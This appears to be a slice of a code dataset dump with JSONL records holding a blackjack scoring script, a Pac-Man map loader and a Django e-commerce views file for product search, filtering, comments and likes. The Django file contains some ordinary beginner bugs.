"line_number": 135, "usage_type": "name"}, {"api_name": "frappe.get_all", "line_number": 138, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 157, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 109, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 165, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 165, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 165, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 166, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 174, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 163, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 213, "usage_type": "call"}, {"api_name": "frappe.db.set_value", "line_number": 214, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 214, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 219, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 211, "usage_type": "call"}, {"api_name": "club_crm.club_crm.doctype.fitness_training_appointment.fitness_training_appointment.cancel_appointment_online", "line_number": 231, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 233, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 238, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 229, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 245, "usage_type": "call"}, {"api_name": "club_crm.api.wallet.get_balance", "line_number": 249, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 250, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 243, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 258, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 256, "usage_type": "call"}]}
+{"seq_id": "31975321226", "text": "from functools import reduce\n\ndef aces_value(aces, non_aces_total):\n if len(aces) == 0:\n return 0\n missing = 21 - non_aces_total\n with_11 = 11 + len(aces)-1\n without_11 = len(aces)\n if with_11 <= missing:\n return with_11\n else:\n return without_11\n\ndef card_value(card):\n if \"Q\" == card or \"J\" == card or \"K\" == card:\n return 10\n else:\n return int(card)\n\ndef value(hand):\n count = len(hand)\n aces = filter(lambda x: x == \"A\", hand)\n non_aces = filter(lambda x: x != \"A\", hand)\n non_aces_value = map(lambda x: card_value(x), non_aces)\n non_aces_total = reduce(lambda x,y: x+y, non_aces_value, 0)\n aces_total = aces_value(list(aces), non_aces_total)\n return non_aces_total + aces_total\nprint(value([\"2\",\"2\", \"3\"]))\nprint(value([\"A\", \"A\"]))\ntwenty_one_aces = [\"A\"] * 21\nprint(value(twenty_one_aces))\n\n", "repo_name": "rafaelri/coding-challenge-solutions", "sub_path": "python/blackjack/blackjack.py", "file_name": "blackjack.py", "file_ext": "py", "file_size_in_byte": 877, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "functools.reduce", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "28718791023", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Build Preliminaries of PacMan Game\"\"\"\n\nimport logging\n\n# Set logging\nlogging.basicConfig(level=logging.ERROR, filemode='w')\n\n\ndef load_map(file_pathname):\n \"\"\"Load Pac-Man Map\n\n Arguments:\n file_pathname {str} -- the file path name of a Pac-Man map\n\n Raises:\n FileNotFoundError: Provided file path name is not found\n IOError: Provided file path name can not accessible by read mode\n\n Returns:\n list -- A list of lines of Pac-Man Map\n \"\"\"\n if not isinstance(file_pathname, str):\n raise TypeError(\"Your file path must be a string\")\n try:\n # Open the file back and read the contents\n with open(file_pathname, \"r\") as map_file:\n contents = map_file.read().splitlines()\n # Check if the file or directory at `path` can be found\n except FileNotFoundError:\n raise FileNotFoundError(\"File does not exist\")\n # Check if the file or directory at `path` can be accessed by the program\n except IOError:\n raise IOError(\"File is not accessible\")\n # Returns a list of line\n return contents\n\n\ndef main():\n \"\"\"Demonstrate and run test\"\"\"\n file_pathname = './map/level1.amap'\n\n # Test wp01\n pacman_map = load_map(file_pathname)\n for line in pacman_map:\n print(line)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "kang-de-conqueror/pac_man", "sub_path": "game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 1371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 8, "usage_type": "attribute"}]}
+{"seq_id": "19222687482", "text": "import random\nfrom decimal import Decimal\nfrom django.forms.models import model_to_dict\n\nfrom django.db.models import Q\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import JsonResponse, HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.text import slugify\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core import serializers\n\n\nfrom .models import Category, Product, ProductType, ProductSpecificationValue, Comments\nfrom .forms import AddToCartForm, AddCategoryForm, ColorSearchForm\n\nfrom apps.cart.cart import Cart\nfrom apps.vendor.forms import ProductForm, VendorRegistrationForm, VendorEditForm\nfrom apps.communication.forms import NewCommentForm\nfrom apps.vendor.models import Follow\n\n\ndef show_category(request,hierarchy= None):\n category_slug = hierarchy.split('/')\n parent = None\n root = Category.objects.all()\n for slug in category_slug[:-1]:\n parent = root.get(parent=parent, slug = slug)\n instance = Category.objects.get(parent=parent,slug=category_slug[-1])\n product = Product.objects.filter(\n category__in=Category.objects.filter(name=instance.name).get_descendants(include_self=True))\n brands = ProductType.objects.all()\n return render(request, 'product/search.html', {'product_search': product, 'product_search_query': instance\n , 'brands':brands})\n\ndef parent_child_check(request):\n if request.POST.get('mainAction') == 'post':\n id = request.POST.get('category_id')\n categories = Category.objects.filter(level=0)\n for i in categories:\n categories = Category.objects.get(id=i.id).get_descendants(include_self=True)\n response = JsonResponse({'categories': \"rr\"})\n return response\n\ndef product_all(request):\n products = Product.objects.prefetch_related(\"product_image\").filter(is_active=True)\n return render(request, \"store/product_all.html\", {\"products\": products})\n\ndef search(request):\n query = request.GET.get('query', '')\n product = Product.objects.filter(Q(title__icontains=query) | Q(description__icontains=query))\n brands = ProductType.objects.all()\n\n return render(request, 'product/search.html', {'product_search': product, 'product_search_query': query\n , 'brands':brands, 'color_input':ColorSearchForm})\n\ndef filter_page(request):\n if request.method == \"GET\":\n query = request.GET.get('query', '')\n query = query.split(',')\n discount_percent = []\n user_chose_spec = False\n \"\"\"sizes = ['S','M','L','X','XL','XXL','Red','Blue','White','Black',\n 'Brown','Green','Yellow','Purple','Orange','Cream','Lemon']\"\"\"\n for i in query:\n if i == '< 10%':\n for num in range(1,10):\n discount_percent.append(num)\n if i == '< 20%':\n for num in range(11,21):\n discount_percent.append(num)\n if i == '< 30%':\n for num in range(21,31):\n discount_percent.append(num)\n if i == '< 40%':\n for num in range(31,41):\n discount_percent.append(num)\n if i == '< 50%':\n for num in range(41,51):\n discount_percent.append(num)\n if i == '< 60%':\n for num in range(51,61):\n discount_percent.append(num)\n\n brands = ProductType.objects.all()\n\n name_list = []\n for i in query:\n instance = Category.objects.filter(slug=i)\n if instance:\n for all in instance:\n name_list.append(all.name)\n if 'has_category' in query and \"has_brand\" in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent, 
product_type__name__in=query,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif 'has_category' in query and \"has_brand\" in query:\n product = Product.objects.filter(Q(product_type__name__in=query,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif 'has_category' in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif \"has_brand\" in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent, product_type__name__in=query))\n elif 'has_category' in query:\n product = Product.objects.filter(Q(category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif \"has_brand\" in query:\n product = Product.objects.filter(Q(product_type__name__in=query))\n elif \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent))\n\n if ('has_size' in query or 'has_color' in query):\n spec_list=[]\n if ('has_category' in query or \"has_brand\" in query or \"has_discount\" in query) and \\\n ('has_size' in query or 'has_color' in query):\n specification = ProductSpecificationValue.objects.filter(Q(product__in=product, value__in=query))\n for spec in specification:\n spec_list.append(spec.product.id)\n\n if ('has_category' not in query and \"has_brand\" not in query and \"has_discount\" not in query) and \\\n ('has_size' in query or 'has_color' in query):\n specification = ProductSpecificationValue.objects.filter(Q(value__in=query))\n for spec in specification:\n spec_list.append(spec.product.id)\n product = Product.objects.filter(Q(id__in=spec_list))\n if ('has_category' in query):\n query.remove('has_category')\n if (\"has_brand\" in query):\n query.remove(\"has_brand\")\n if (\"has_discount\" in query):\n query.remove(\"has_discount\")\n if ('has_size' in query):\n query.remove('has_size')\n if ('has_color' in query):\n query.remove('has_color')\n\n return render(request, 'product/filter_page.html', {'product_search': product, 'product_search_query': query\n , 'brands':brands, 'user_chose_spec':user_chose_spec})\n\ndef search_brand(request):\n if request.GET.get('action') == 'get':\n brands = request.GET.get('brands')\n brands = ProductType.objects.filter(name__iexact=brands)\n\n item = {}\n if brands:\n serialized_queryset = serializers.serialize('python', brands)\n item['table'] = serialized_queryset\n\n response = JsonResponse({'item': item})\n return response\n\nfrom django import template\nregister = template.Library()\n\n\n#@register.simple_tag(takes_context=True)\n@register.filter(is_safe=True)\ndef search_single(request):\n if request.method == \"GET\":\n query = request.GET.get('query', '')\n product_search = Product.objects.filter(Q(title__icontains=query) |\n Q(description__icontains=query) | Q(id__icontains=query))\n brands = ProductType.objects.all()\n\n response = JsonResponse({'product_search': list(product_search)})\n return response\n\ndef search_single2(request):\n if request.GET.get('action') == 'get':\n query = request.GET.get('productID')\n product_search = Product.objects.filter(Q(title__icontains=query) |\n Q(description__icontains=query) | Q(id__icontains=query)).values()\n brands = ProductType.objects.all()\n product = \"\"\"\n \n {% for i in product_search %}\n
\n \n {% for image in i.product_images.all %}\n {% if image.is_main %}\n
\n
10% \n
\n
\n
{{i.description}} \n NGstoreboy Price Now \n {{i.price}} \n {{i.discount_price}} \n ADD TO CART \n \n {% endif %}\n {% endfor %}\n
\n \n {% endfor %}\n
\"\"\"\n response = JsonResponse({'product_search': list(product)})\n return response\ndef product_detail(request, category_slugz, product_slugz):\n cart = Cart(request)\n products = get_object_or_404(Product, category__slug=category_slugz, slug=product_slugz, is_active=True)\n stores_user_follow=[]\n for i in products.vendor.vendor_follower.all():\n stores_user_follow.append(i.follower)\n\n wishlist = products.users_wishlist.all().count()\n likes = products.likes.all().count()\n product_id = str(products.id)\n wishlist_boolean = False\n like_boolean = False\n product_spec = ProductSpecificationValue.objects.filter(product=products)\n\n #------------------------------------------------------\n allcomments = products.comments.all()\n page = request.GET.get('page', 1)\n\n paginator = Paginator(allcomments, 10)\n try:\n comments = paginator.page(page)\n except PageNotAnInteger:\n comments = paginator.page(1)\n except EmptyPage:\n comments = paginator.page(paginator.num_pages)\n\n if products.users_wishlist.filter(id=request.user.id).exists():\n wishlist_boolean=True\n if products.likes.filter(id=request.user.id).exists():\n like_boolean=True\n if request.method == 'POST':\n comment_form = NewCommentForm(request.POST)\n if comment_form.is_valid():\n user_comment = comment_form.save(commit=False)\n user_comment.post = products\n user_comment.save()\n return HttpResponseRedirect('/' + products.slug)\n\n return redirect('product_:product_detail_', category_slug= category_slugz, product_slug=product_slugz)\n else:\n comment_form = NewCommentForm()\n form = AddToCartForm()\n\n #----------------------------------------------------\n similar_products = list(products.category.product_category.exclude(id=products.id))\n if len(similar_products) >= 4:\n similar_products = random.sample(similar_products, 4)\n\n #-------------------------------------------------\n breadcrumbs_link = products.get_cat_list()\n category_name = [' '.join(i.split('/')[-1].split('-')) for i in breadcrumbs_link]\n breadcrumbs = zip(breadcrumbs_link, category_name)\n return render(request, 'product/product.html', {'comment_form': comment_form, 'product': products, 'product_id': product_id,\n 'wishlist': str(wishlist), 'wishlist_boolean':wishlist_boolean,\n 'likes': str(likes), 'like_boolean':like_boolean, 'allcomments':allcomments, 'comments':comments,\n 'product_spec':product_spec, 'stores_user_follow':stores_user_follow, 'breadcrumbs': breadcrumbs})\n\n\ndef make_comment(request):\n cart = Cart(request)\n if request.POST.get('action') == 'post':\n name = request.POST.get('name')\n email = request.POST.get('email')\n comment = request.POST.get('comment')\n product_id = request.POST.get('product_id')\n products = Product.objects.get_object_or_404get(id=product_id)\n wishlist = products.users_wishlist.all().count()\n likes = products.likes.all().count()\n product_id = str(products.id)\n wishlist_boolean = False\n like_boolean = False\n product_spec = ProductSpecificationValue.objects.filter(product=products)\n\n # ------------------------------------------------------\n if request.user.is_authenticated:\n Comments.objects.create(made_by=request.user,\n name=request.user.firstname + \" \" + request.user.surname,\n email=request.user.email, default_image=request.user.user_image,\n made_on=products, parent=None, content=comment)\n else:\n if not request.user.is_authenticated and name != \"\" and email != \"\":\n Comments.objects.create(made_by=None, name=name, email=request.user.email,\n made_on=products, parent=None, 
content=comment)\n else:\n error = \"comment could not be saved\"\n\n response = JsonResponse({'comments': error})\n return response\n\n allcomments = products.comments.all()\n page = request.GET.get('page', 1)\n\n paginator = Paginator(allcomments, 10)\n try:\n comments = paginator.page(page)\n except PageNotAnInteger:\n comments = paginator.page(1)\n except EmptyPage:\n comments = paginator.page(paginator.num_pages)\n\n if products.users_wishlist.filter(id=request.user.id).exists():\n wishlist_boolean = True\n if products.likes.filter(id=request.user.id).exists():\n like_boolean = True\n\n # ----------------------------------------------------\n similar_products = list(products.category.product_category.exclude(id=products.id))\n if len(similar_products) >= 4:\n similar_products = random.sample(similar_products, 4)\n\n # -------------------------------------------------\n breadcrumbs_link = products.get_cat_list()\n category_name = [' '.join(i.split('/')[-1].split('-')) for i in breadcrumbs_link]\n breadcrumbs = zip(breadcrumbs_link, category_name)\n\n\n comment_form = NewCommentForm()\n form = AddToCartForm()\n\n return render(request, 'product/product.html',\n {'comment_form': comment_form, 'product': products, 'product_id': product_id,\n 'wishlist': str(wishlist), 'wishlist_boolean': wishlist_boolean,\n 'likes': str(likes), 'like_boolean': like_boolean, 'allcomments': allcomments,\n 'comments': comments,\n 'product_spec': product_spec, 'breadcrumbs': breadcrumbs})\n\n\ndef product_detail2(request):\n cart = Cart(request)\n if request.POST.get('action') == 'post':\n qtyAction = request.POST.get('qtyAction')\n productID = int(request.POST.get('productID'))\n productQTY = int(request.POST.get('productQTY'))\n if qtyAction == 'include_item':\n product = get_object_or_404(Product, id=productID)\n cart.add(product_id=productID, product=product, quantity=productQTY, update_quantity=False)\n messages.success(request, 'The product was successfully added to the cart')\n response = JsonResponse(\n {'cart_length': cart.__len__()})\n return response\n\n@login_required\ndef add_category(request):\n if request.user.is_superuser:\n if request.method == \"POST\":\n form = AddCategoryForm(request.POST)\n if form.is_valid():\n vendor = form.save(commit=False)\n title = form.cleaned_data['title']\n slug = form.cleaned_data['slug']\n Category.objects.create(title=title, slug=slug, ordering='1')\n else:\n form=AddCategoryForm()\n return render(request,'product/add_category.html', {'form':form})\n else:\n return redirect('core_:frontpage')\n\ndef category_list(request, category_slug):\n category = get_object_or_404(Category, slug=category_slug)\n return render(request, 'product/category.html', {'category_in_product_view': category})\n\ndef vendor_category(request):\n if request.GET.get('mainAction') == 'post':\n category_slug = request.GET.get('category_slug')\n category = get_object_or_404(Category, slug=category_slug)\n product = Product.objects.filter(\n category__in=category.get_descendants(include_self=True)\n )\n response = JsonResponse({'product': list(product.values())})\n return response\n\n@login_required\ndef likes_add_and_remove(request, id):\n if request.GET.get('action') == 'get':\n product = get_object_or_404(Product, id=id)\n if product.likes.filter(id=request.user.id).exists():\n product.likes.remove(request.user)\n product_exist = True\n action_text=' like '\n else:\n product.likes.add(request.user)\n product_exist = False\n action_text=' unlike '\n likes = 
product.likes.all().count()\n response = JsonResponse({'likes_no': str(likes), 'action_text':action_text, 'product_exist':product_exist})\n return response\n\n@login_required\ndef remove_from_likes(request):\n if request.GET.get('action') == 'get':\n id = request.GET.get('productID')\n product = get_object_or_404(Product, id=id)\n if product.likes.filter(id=request.user.id).exists():\n product.likes.remove(request.user)\n messages.success(request, \"you have unliked \" + product.title)\n product_count = product.likes.count()\n response = JsonResponse({'product_count':product_count})\n return response\n\n@login_required\ndef add_product(request):\n vendor = request.user.which_vendor\n if request.method == \"POST\":\n form = ProductForm(request.POST, request.FILES)\n if form.is_valid():\n product = form.save(commit=False)\n\n product.vendor = vendor\n product.title = product.title\n product.category = product.category\n product.slug = slugify(product.title)\n product.description = product.description\n product.price = Decimal(product.price)\n product.in_stock = True\n product.is_active = True\n product.save()\n return redirect('vendor_:vendor_admin_')\n else:\n form=ProductForm()\n return render(request,'vendor/add_product.html', {'form':form})\n\n@login_required\ndef add_category(request):\n if request.user.is_superuser:\n if request.method == \"POST\":\n form = AddCategoryForm(request.POST)\n if form.is_valid():\n vendor = form.save(commit=False)\n title = form.cleaned_data['title']\n slug = form.cleaned_data['slug']\n Category.objects.create(title=title, slug=slug, ordering='1')\n else:\n form=AddCategoryForm()\n return render(request,'product/add_category.html', {'form':form})\n else:\n return redirect('core_:frontpage')\n", "repo_name": "Pycobra/NgStore2", "sub_path": "apps/product/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 19849, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "models.Category.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 27, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 30, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 31, "usage_type": "name"}, {"api_name": "models.Category.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 32, "usage_type": "name"}, {"api_name": "models.ProductType.objects.all", "line_number": 33, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 33, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": 
"models.Category", "line_number": 40, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 42, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 43, "usage_type": "call"}, {"api_name": "models.Product.objects.prefetch_related", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 52, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 53, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 53, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "forms.ColorSearchForm", "line_number": 56, "usage_type": "name"}, {"api_name": "models.ProductType.objects.all", "line_number": 86, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 86, "usage_type": "name"}, {"api_name": "models.Category.objects.filter", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 90, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 95, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 96, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 98, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 99, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 99, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 101, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 102, "usage_type": "call"}, 
{"api_name": "models.Category.objects", "line_number": 102, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 102, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 104, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 106, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 106, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 108, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 110, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 110, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 110, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 116, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 116, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 116, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 122, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 122, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 125, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 137, "usage_type": "call"}, {"api_name": "models.ProductType.objects.filter", "line_number": 143, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 143, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 147, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 147, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 150, "usage_type": "call"}, {"api_name": "django.template.Library", "line_number": 154, "usage_type": "call"}, {"api_name": "django.template", "line_number": 
154, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 162, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 162, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 162, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 162, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 163, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 164, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 164, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 164, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 166, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 172, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 172, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 172, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 172, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 173, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 174, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 174, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 174, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 199, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 202, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 203, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 203, "usage_type": "argument"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 213, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 213, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 213, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 219, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 222, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 224, "usage_type": "name"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 232, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 237, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 239, "usage_type": "call"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 241, "usage_type": "call"}, {"api_name": "forms.AddToCartForm", "line_number": 242, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 247, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 253, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 260, "usage_type": "call"}, {"api_name": "models.Product.objects.get_object_or_404get", "line_number": 266, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 266, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 266, "usage_type": "name"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 272, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 272, "usage_type": "attribute"}, {"api_name": 
"models.ProductSpecificationValue", "line_number": 272, "usage_type": "name"}, {"api_name": "models.Comments.objects.create", "line_number": 276, "usage_type": "call"}, {"api_name": "models.Comments.objects", "line_number": 276, "usage_type": "attribute"}, {"api_name": "models.Comments", "line_number": 276, "usage_type": "name"}, {"api_name": "models.Comments.objects.create", "line_number": 282, "usage_type": "call"}, {"api_name": "models.Comments.objects", "line_number": 282, "usage_type": "attribute"}, {"api_name": "models.Comments", "line_number": 282, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 287, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 293, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 296, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 298, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 309, "usage_type": "call"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 317, "usage_type": "call"}, {"api_name": "forms.AddToCartForm", "line_number": 318, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 320, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 329, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 335, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 335, "usage_type": "argument"}, {"api_name": "django.contrib.messages.success", "line_number": 337, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 337, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 338, "usage_type": "call"}, {"api_name": "forms.AddCategoryForm", "line_number": 346, "usage_type": "call"}, {"api_name": "models.Category.objects.create", "line_number": 351, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 351, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 351, "usage_type": 